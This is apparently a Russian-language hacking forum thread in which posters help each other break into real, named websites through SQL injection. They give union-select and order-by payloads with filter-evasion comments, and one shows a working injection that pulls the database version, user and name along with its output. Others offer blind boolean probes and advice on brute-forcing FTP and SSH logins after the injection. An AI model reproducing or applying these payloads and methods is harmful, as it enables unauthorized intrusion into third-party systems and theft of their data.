Если отсутствуют, то возможно: 1) В другой БД 2) доступ в админку по данным из файла 3) Таблица названа не "admin" а к примеру "images_222". Ищи таблицы с условием что в ней есть колонки LIKE '%pass%' и т.д. Если пасы не подходят: 1) Искать другую админку 2) Просканировать сабдомены 3) Пробрутить FTP \ SSH с использованием хакерской догадки. (Хакерская догадка нужна для подбора логина. Примеры: то что вытащил из скули, root, www, user() которого вытащил скули, site.ru, site, siteru, ftp, etc.....)
помогите разобраться: как я понимаю это блинд, но она по идее выводит результаты в отчетах об ошибке, как ту можно еще вывод посмотреть?
потому что запросы ввиде: +union+select+1,2,3,4,5,6,7,8,9-- +/!union+select+1,2,3,4,5,6,7,8,9-- не проходят, а group+by+ говорит что их 9, а приведеный выше запрос проходит, но введу того что отчет об ошибках там отключен, мы не можем его увидеть, вот и интиресует, что в такой ситуации еще можно придумать...
Сравни запросы: Code: http://board.salle.com.ua/index.php?catid=25+order+by+9--+ Code: http://board.salle.com.ua/index.php?catid=25+pohui+chto+pisat+9--+ Результат одинаковый
Там нет скули. Все символы, кроме цифр пропускаются, поэтому приведенные выше запросы эквивалентны запросу Code: http://board.salle.com.ua/index.php?catid=259
ммм, вообще то там скорее есть уязвимость, т.к. Code: http://board.salle.com.ua/index.php?catid=25 // возвращает "Объявления раздела Продукты" http://board.salle.com.ua/index.php?catid=0+or+25 // возвращает "Объявления раздела Продукты" http://board.salle.com.ua/index.php?catid=0+or+24 // возвращает "Объявления раздела Оборудование" из чего делаем вывод, что там просто фильтр-блэклист "вредных" символов и слов, обойти который я пока не смог Да и запрос там такой: Code: select cat_name from board_category where cat_id = ДАННЫЕ Исходя из этого: Code: http://board.salle.com.ua/index.php?catid[]=
Я же написал - фильтруется все, кроме цифр. 0+or+25 вернет то же самое, что и 25, 025 или к примеру 0№*)_(hfb2JMU5
Согласен, там скорее всего preg_match, т.к. он убирает из запроса всё кроме букв, т.е. при запросе Code: http://board.salle.com.ua/index.php?catid=25+order+by+10 он ничего не возвращает, а при запросе Code: http://board.salle.com.ua/index.php?catid=25+order+by+9 он возвращает 259 страницу: Code: http://board.salle.com.ua/index.php?catid=259
HEEEEEEEEEELP!! Есть oracle 10g sql injection вида: Можно ли как нибудь изменить значение в базе данных? Например пробую так: Выдает ошибку: Помогите плз!
Помогите раскрутить, не знаю, как подступиться! http://www.dougie-poynter.com/discography/release.php?id=23'
Запрос: Code: http://www.dougie-poynter.com/discography/release.php?id=-1/**/union/**//*!select*//**/1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15 Результат: Code: 5.0.92-community:dougie_user@localhost:dougie_
Нет. http://www.designersimports.com/itemdetail.asp?mod=EH5009LOT%20and%20true=true http://www.designersimports.com/itemdetail.asp?mod=EH5009LOT%20and%20true=false